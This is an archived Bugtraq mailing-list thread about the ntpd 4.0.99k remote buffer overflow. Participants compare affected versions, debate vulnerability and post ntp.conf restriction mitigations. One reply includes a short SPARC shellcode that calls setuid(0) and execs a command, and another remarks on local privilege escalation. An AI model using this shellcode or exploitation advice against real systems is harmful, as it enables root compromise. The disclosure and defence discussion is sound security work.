6329104 2001-04-06 00:24 -0400 /36 rader/ Erik Fichtner <techs@OBFUSCATION.ORG>
Sänt av: joel@lysator.liu.se
Importerad: 2001-04-06 21:46 av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: techs@obfuscation.org
Mottagare: Bugtraq (import) <16371>
Kommentar till text 6323400 av Durval Menezes <durval@TMP.COM.BR>
Ärende: Re: ntpd =< 4.0.99k remote buffer overflow
------------------------------------------------------------
On Thu, Apr 05, 2001 at 08:52:43AM -0300, Durval Menezes wrote:
> Tried here against stock xntpd 3.5f (from xntpd-3.5f-3.i386.rpm) on a Redhat
> Linux 3.0.3 w/ kernel 2.0.36, and the exploit didn't have ANY effect: no
> root shell was spawned, and the daemon stayed up. An "strace" of the running
> xntpd process confirmed this: no exec syscalls were attempted.
[...]
> Another vindication for those (like me) that don't like to run the
> "latest and greatest" versions of any code ....
False hope, man.
xntpd 3.5f [1] has the exact same ctl_getitem() that 4.0.99k has,
with the same char buf[128] that is poked at in the exact same way.
(line 1733 of xntpd/ntp_control.c)
It's just a matter of fiddling with it until it's breakable on your
particular system.
The previously posted patch is a pretty rough way to escape, but it
seems to work just fine.
[1] Yeah, I just happened to have an old copy of this in a sources
archive.
--
Erik Fichtner; Unix Ronin
http://www.obfuscation.org/techs/ "The reasonable
man adapts himself to the world; the unreasonable one persists in
trying to adapt the world to himself. Therefore, all progress
depends on the unreasonable." -- George Bernard Shaw
(6329104) /Erik Fichtner <techs@OBFUSCATION.ORG>/(Ombruten)
Bilaga (application/pgp-signature) i text 6329105
Kommentar i text 6329452 av Durval Menezes <durval@TMP.COM.BR>
6329105 2001-04-06 00:24 -0400 /10 rader/ Erik Fichtner <techs@OBFUSCATION.ORG>
Importerad: 2001-04-06 21:46 av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: techs@obfuscation.org
Mottagare: Bugtraq (import) <16372>
Bilaga (text/plain) till text 6329104
Ärende: Bilaga till: Re: ntpd =< 4.0.99k remote buffer overflow
------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org
iEYEARECAAYFAjrNRRMACgkQDf8awdbGHo330gCguSJAHx6wyUQHAPOWUzw6/77/
9bEAn1GQW9P+w16jqlxcXNjAofokJt+M
=hYkr
-----END PGP SIGNATURE-----
(6329105) /Erik Fichtner <techs@OBFUSCATION.ORG>/---
6329452 2001-04-06 08:38 -0300 /54 rader/ Durval Menezes <durval@TMP.COM.BR>
Sänt av: joel@lysator.liu.se
Importerad: 2001-04-06 23:08 av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: durval@TMP.COM.BR
Mottagare: Bugtraq (import) <16379>
Kommentar till text 6329104 av Erik Fichtner <techs@OBFUSCATION.ORG>
Ärende: Re: ntpd =< 4.0.99k remote buffer overflow
------------------------------------------------------------
From: Durval Menezes <durval@TMP.COM.BR>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <20010406083817.C17140@tmp.com.br>
Hello,
On Fri, Apr 06, 2001 at 12:24:53AM -0400, Erik Fichtner wrote:
> On Thu, Apr 05, 2001 at 08:52:43AM -0300, Durval Menezes wrote:
> > Tried here against stock xntpd 3.5f (from xntpd-3.5f-3.i386.rpm) on a Redhat
> > Linux 3.0.3 w/ kernel 2.0.36, and the exploit didn't have ANY effect: no
> > root shell was spawned, and the daemon stayed up. An "strace" of the running
> > xntpd process confirmed this: no exec syscalls were attempted.
>
> [...]
>
> > Another vindication for those (like me) that don't like to run the
> > "latest and greatest" versions of any code ....
>
> False hope, man.
>
> xntpd 3.5f [1] has the exact same ctl_getitem() that 4.0.99k has,
> with the same char buf[128] that is poked at in the exact same way.
> (line 1733 of xntpd/ntp_control.c)
>
> It's just a matter of fiddling with it until it's breakable on your
> particular system.
If it's really vulnerable, shouldn't it have at least dumped core?
I think that, when you exercise a buffer overflow against a program
that's vulnerable, if that buffer overflow isn't "tuned" (i.e., the
forced syscalls aren't the right number or the right parameters, the
stack frame isn't as expected, or even it's not the right CPU), there
would be a *very*high* probability (almost a certainty) of aborting
the program somehow (either because of an invalid instruction, or
because of an invalid syscall number, or because the stack frame
format was violated).
But you are right, I should have checked. Will do it ASAP: compiling
and running a "-g" version under GDB (or else inserting a few
well-placed printf/syslog()'s) and exercising the attack should do
it. My theory right now (without looking at the source code) is that
the exploit has not worked because something else in the code
(outside of ctl_getitem()) has prevented it.
> The previously posted patch is a pretty rough way to escape, but it seems
> to work just fine.
Thanks for the info.
Best Regards,
--
Durval Menezes (durval AT tmp DOT com DOT br, http://www.tmp.com.br/)
(6329452) /Durval Menezes <durval@TMP.COM.BR>/(Ombruten)
6329201 2001-04-06 00:35 -0400 /37 rader/ Valdis Kletnieks <Valdis.Kletnieks@VT.EDU>
Sänt av: joel@lysator.liu.se
Importerad: 2001-04-06 22:06 av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: Valdis.Kletnieks@VT.EDU
Mottagare: Bugtraq (import) <16373>
Kommentar till text 6323400 av Durval Menezes <durval@TMP.COM.BR>
Ärende: Re: ntpd =< 4.0.99k remote buffer overflow
------------------------------------------------------------
From: Valdis Kletnieks <Valdis.Kletnieks@VT.EDU>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <200104060435.f364ZMn22966@foo-bar-baz.cc.vt.edu>
On Thu, 05 Apr 2001 08:52:43 -0300, Durval Menezes <durval@TMP.COM.BR> said:
> Tried here against stock xntpd 3.5f (from xntpd-3.5f-3.i386.rpm) on a Redhat
> Linux 3.0.3 w/ kernel 2.0.36, and the exploit didn't have ANY effect: no
> root shell was spawned, and the daemon stayed up. An "strace" of the running
> xntpd process confirmed this: no exec syscalls were attempted.
>
> Same think on SPARC Solaris 2.5.1 also running xntpd 3.5f: no shell, and
> the xntpd daemon stayed up with no exec syscalls showing on "truss".
>
> Another vindication for those (like me) that don't like to run the
> "latest and greatest" versions of any code (I only upgrade my machines
> when forced to, either because of security bugs, or because of desperately
> needed new functionality, and even then only after running it for awhile
> on a test system INSIDE my firewall, and preferably doing an audit on the
> code myself).
That doesn't prove you're not vulnerable. It proves the
proof-of-concept code doesn't work against that release.
As Dykstra pointed out decades ago:
"Testing can prove the presence of bugs, but not their absence."
Until somebody shows that the bug was in code introduced at level
4.mumble or something, I'm going to have to assume that the bug has
been in there ever since the NTPv1 distribution, especially since it
causes a segfault on the Irix ntp 3.5.
Valdis Kletnieks
Operating Systems Analyst
Virginia Tech
(6329201) /Valdis Kletnieks <Valdis.Kletnieks@VT.EDU>/(Ombruten)
6329228 2001-04-05 22:33 -0400 /28 rader/ Erik Fichtner <techs@OBFUSCATION.ORG>
Sänt av: joel@lysator.liu.se
Importerad: 2001-04-06 22:14 av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: techs@obfuscation.org
Mottagare: Bugtraq (import) <16374>
Kommentar till text 6323277 av Ogle Ron (Rennes) <OgleR@THMULTI.COM>
Ärende: Re: ntpd =< 4.0.99k remote buffer overflow
------------------------------------------------------------
On Thu, Apr 05, 2001 at 11:38:47AM +0200, Ogle Ron (Rennes) wrote:
> Until that time, we are blocking NTP access from the Internet (for those of
> us who use Internet stratum 1 servers) for the NTP protocol.
> I suggest that other people in the same situation do the same until a proper
> fix is made.
Unfortunately, the exploit makes a really handy local exploit for a user
who can already get a binary onto the system. Since the ntp server
will crash in its death throes, one can't really use it to fire a whole
sequence of commands into the system, but it's pretty easy to use it for
local privlege elevation. Good luck with firewalling that. ;)
Thanks for the link to a patch, though. It's worth looking at to see
if it really solves the problem or not.
Also, has anyone tested this exploit against ntp implementations on routers
and such? Some of us have to wait for a "maintenence window" before we
can potentially hork up a router.
--
Erik Fichtner; Unix Ronin
http://www.obfuscation.org/techs/ "The reasonable
man adapts himself to the world; the unreasonable one persists in
trying to adapt the world to himself. Therefore, all progress
depends on the unreasonable." -- George Bernard Shaw
(6329228) /Erik Fichtner <techs@OBFUSCATION.ORG>/(Ombruten)
Bilaga (application/pgp-signature) i text 6329229
6329229 2001-04-05 22:33 -0400 /10 rader/ Erik Fichtner <techs@OBFUSCATION.ORG>
Importerad: 2001-04-06 22:14 av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: techs@obfuscation.org
Mottagare: Bugtraq (import) <16375>
Bilaga (text/plain) till text 6329228
Ärende: Bilaga till: Re: ntpd =< 4.0.99k remote buffer overflow
------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org
iEYEARECAAYFAjrNKwcACgkQDf8awdbGHo2GGwCfXHGJdBeS2XXmGejemZxjr1rY
Es8AoI94FJCWqG/xootusmnUejxuL/xH
=pxUf
-----END PGP SIGNATURE-----
(6329229) /Erik Fichtner <techs@OBFUSCATION.ORG>/---
6329251 2001-04-06 10:44 +0000 /20 rader/ Sebastian Piech <decc@W-SIECI.COM>
Sänt av: joel@lysator.liu.se
Importerad: 2001-04-06 22:19 av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: decc@W-SIECI.COM
Mottagare: Bugtraq (import) <16376>
Kommentar till text 6323336 av Tomasz Grabowski <cadence@APOLLO.ACI.COM.PL>
Ärende: Re: ntpd =< 4.0.99k remote buffer overflow
------------------------------------------------------------
From: Sebastian Piech <decc@W-SIECI.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <3ACD9E13.42919CF5@w-sieci.com>
Tomasz Grabowski wrote:
> On IRIX 6.5.11 it also seg faults.
>
> ntpq
> ntpq> version
> ntpq 3-5.93e Thu Dec 10 10:49:39 PST 1998 (1)
> ntpq> quit
>
> It's rather old isn't it?
> It's the default IRIX 6.5.11 installation.
Exploit doesn't work with same version of xntpd [3-5.93e Fri Feb 18
18:55:22 EST 2000 (1)] on RH 6.2 kern. 2.2.14-5.0 (default
instalation).
(6329251) /Sebastian Piech <decc@W-SIECI.COM>/(Ombruten)
6329319 2001-04-06 13:27 +0200 /62 rader/ Alexander Gall <gall@SWITCH.CH>
Sänt av: joel@lysator.liu.se
Importerad: 2001-04-06 22:41 av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: gall@SWITCH.CH
Mottagare: Bugtraq (import) <16377>
Kommentar till text 6323794 av Matt Collins <matt@CLUES.COM>
Ärende: Re: ntpd =< 4.0.99k remote buffer overflow
------------------------------------------------------------
From: Alexander Gall <gall@SWITCH.CH>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <E14lUOe-0002dF-00@central.switch.ch>
> On Wed, Apr 04, 2001 at 06:49:01PM -0700, Crist Clark wrote:
> > Przemyslaw Frasunek wrote:
> > >
> > > /* ntpd remote root exploit / babcia padlina ltd. <venglin@freebsd.lublin.pl> */
> >
> > Not good. Not good. Verified the exploit worked on FreeBSD 4.2-STABLE with
> > the stock 4.0.99b. FreeBSD has a fix in CURRENT already.
> >
> > More sobering, blindly aiming the exploit code at a Sparc running xntpd 3.4y
> > caused it to seg. fault and core. No time to double-check if that is actually
> > exploitable at this moment. How many NTP distributions are based off of the
> > vulnerable code? With the small payload, gaining access might be hard, but
> > the potential for DoS looks pretty easy.
>
> We've taken a peek at getting sparc shellcode working with this. Getting
> it in below the 70 byte buffer size is tricky.
>
> Does anybody out there have working shellcode for this that can do *anything*
> to the state of the system even if it doesnt lead to full sploit? (beyond
> making ntp core of course ;) )
Well, here is a shellcode that is 69 bytes large and execs
'/bin/touch /tmp/test' as root (if called from a setuid root program)
char shellcode[]=
"\x90\x10\x20\x00" /* mov 0, %o0 */
"\x82\x10\x20\x17" /* mov 23, %g1 */
"\x91\xd0\x20\x08" /* ta 8 -> setuid(0) */
"\x30\x80\x00\x07" /* ba,a bounce */
"\x90\x03\xe0\x08" /* start: add %o7, 8, %o0 */
"\x92\x03\xa0\x40" /* add %sp, 64, %o1 */
"\xd0\x22\x40\x00" /* st %o0, [%o1] */
"\xc0\x22\x60\x04" /* st %g0, [%o1+4] */
"\x82\x10\x20\x0b" /* mov 11, %g1 */
"\x91\xd0\x20\x08" /* ta 8 -> exec() */
"\x7f\xff\xff\xfa" /* bounce: call start */
"\x01\x00\x00\x00" /* nop */
"/bin/touch /tmp/test";
I don't know if you are aware of this, but simply replacing the
shellcode in the exploit won't work because of the differing layout
of a stack frame on SPARC.
I have also verified that xntpd 3.4y crashes on Solaris 8 with
SIGSEGV. However, when I looked at the core dump I had the
impression that this is *not* due to a buffer overflow because I
couldn't find any of the symptoms that I would expect in such a case
(jump to never-never land because the overwritten return address on
the stack is garbage, %l and %i registers filled with data from the
buffer). I didn't look too hard though, so I may be wrong.
Alex.
___________ SWITCH - The Swiss Academic and Research Network ___________
Alexander Gall, SWITCH, Limmatquai 138, CH-8001 Zurich, Switzerland
gall@switch.ch Tel: +41 1 268 1522 Fax: +41 1 268 1568
(6329319) /Alexander Gall <gall@SWITCH.CH>/(Ombruten)
6329325 2001-04-06 00:06 -0700 /18 rader/ Phil Stracchino <alaric@BABCOM.COM>
Sänt av: joel@lysator.liu.se
Importerad: 2001-04-06 22:43 av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: alaric@BABCOM.COM
Mottagare: Bugtraq (import) <16378>
Kommentar till text 6323277 av Ogle Ron (Rennes) <OgleR@THMULTI.COM>
Ärende: Re: ntpd =< 4.0.99k remote buffer overflow
------------------------------------------------------------
From: Phil Stracchino <alaric@BABCOM.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <20010406000614.A4715@babylon5.babcom.com>
On Thu, Apr 05, 2001 at 11:38:47AM +0200, Ogle Ron (Rennes) wrote:
> There is only a patch for the NTP software from
> http://phk.freebsd.dk/patch/ntpd.patch.
I just tried applying this patch against ntp-4.0.99k, and it fails.
--
Linux Now! ..........Because friends don't let friends use Microsoft.
phil stracchino -- the renaissance man -- mystic zen biker geek
Vr00m: 2000 Honda CBR929RR -- Cage: 2000 Dodge Intrepid R/T
Previous vr00mage: 1986 VF500F (sold), 1991 VFR750F3 (foully murdered)
(6329325) /Phil Stracchino <alaric@BABCOM.COM>/-----
6329474 2001-04-06 09:38 -0700 /57 rader/ Crist Clark <crist.clark@GLOBALSTAR.COM>
Sänt av: joel@lysator.liu.se
Importerad: 2001-04-06 23:15 av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: crist.clark@GLOBALSTAR.COM
Mottagare: Bugtraq (import) <16380>
Kommentar till text 6323528 av Charles Sprickman <spork@INCH.COM>
Ärende: Re: ntpd =< 4.0.99k remote buffer overflow
------------------------------------------------------------
From: Crist Clark <crist.clark@GLOBALSTAR.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <3ACDF0F6.38E165C7@globalstar.com>
Charles Sprickman wrote:
>
> On Wed, 4 Apr 2001, Przemyslaw Frasunek wrote:
>
> > /* ntpd remote root exploit / babcia padlina ltd. <venglin@freebsd.lublin.pl> */
>
> Just a quick note to save others a bit of legwork... If you are running
> ntpd on a machine simply as a client, the following line in /etc/ntp.conf
> should keep people away:
>
> restrict default ignore
>
> Before adding this (I actually had the wrong syntax), the exploit crashed
> ntpd. Afterwords, not a blip, and ntpdate shows that ntpd is not
> answering anything...
One more thing you can do is,
restrict <server IP> noquery
To a server that you are sync'ing from. This protects you from this
exploit, but you can still sync to it. (At least my logic and quick
tests agree with this.)
This is good for the situation where one might be syncing to a public
NTP server (clock.nist.gov, etc.). Since anyone could craft a packet
with that source, you want to deny queries from it, but you can still
sync to it. You can even do,
restrict 127.0.0.1 noquery
To prevent the local exploit on multi-user machines. Your clock will
still sync, but you cannot use 'ntpdc,' 'ntpq,' etc. to check on your
NTP status.
This is not good for your server peering with other hosts or
answering client queries. Besides getting patched software (which is
not yet widely available), using authorization keys should protect
you. However, if the peers or clients are not trusted... Yer hosed.
--
Crist J. Clark Network Security Engineer
crist.clark@globalstar.com Globalstar, L.P.
(408) 933-4387 FAX: (408) 933-4926
The information contained in this e-mail message is confidential,
intended only for the use of the individual or entity named above.
If the reader of this e-mail is not the intended recipient, or the
employee or agent responsible to deliver it to the intended
recipient, you are hereby notified that any review, dissemination,
distribution or copying of this communication is strictly prohibited.
If you have received this e-mail in error, please contact
postmaster@globalstar.com
(6329474) /Crist Clark <crist.clark@GLOBALSTAR.COM>/(Ombruten)
6329597 2001-04-05 20:51 -0700 /58 rader/ Rex Sanders <rex@OCTOPUS.WR.USGS.GOV>
Sänt av: joel@lysator.liu.se
Importerad: 2001-04-06 23:41 av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: rex@OCTOPUS.WR.USGS.GOV
Mottagare: Bugtraq (import) <16381>
Kommentar till text 6315271 av Przemyslaw Frasunek <venglin@FREEBSD.LUBLIN.PL>
Ärende: Re: ntpd =< 4.0.99k remote buffer overflow
------------------------------------------------------------
From: Rex Sanders <rex@OCTOPUS.WR.USGS.GOV>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <l0313030ab6f2e67c32e9@[130.118.24.88]>
You can stop the exploit/DOS with restrictions in the "ntp.conf" file,
while continuing to receive or serve time. You must stop NTP demon
configuration and statistics queries. See the ntpd access control man page:
http://www.eecis.udel.edu/~ntp/ntp_spool/html/accopt.htm
Also, quoting from the man page:
>While this facility may be otherwise useful for keeping unwanted or broken
>remote time servers from affecting your own, it should not be considered an
>alternative to the standard NTP authentication facility. Source address
>based restrictions are easily circumvented by a determined cracker.
See the ntpd authentication control man page:
http://www.eecis.udel.edu/~ntp/ntp_spool/html/authopt.htm
Partial examples of what we use below (restrictions, no
authentication). I'm not an NTP guru, maybe someone else can do
better, but these restrictions stopped the remote exploit without a
reply on various stock Solaris systems; removing the restrictions
caused a core dump upon attack.
Even after the buffer overflow is plugged, hosts running ntp should
have appropriate restrictions in the ntp.conf file.
-- Rex
# Unix time client add:
#
# Don't serve time or stats to anyone else
restrict default ignore
# Prefer to get time from local GPS server
server clock.example.com prefer
restrict 10.1.1.12 nomodify
# Backup server
server clock2.example.com
restrict 10.1.1.13 nomodify
==========
# Unix time server add:
#
# Don't serve time or stats to anyone else
restrict default ignore
# Serve time to local subnets
restrict 10.1.1.0 mask 255.255.255.0 noquery notrust nopeer
restrict 10.1.2.0 mask 255.255.255.0 noquery notrust nopeer
# Prefer to get time from local GPS server
server clock.example.com prefer
restrict 10.1.1.12 nomodify
(6329597) /Rex Sanders <rex@OCTOPUS.WR.USGS.GOV>/(Ombruten)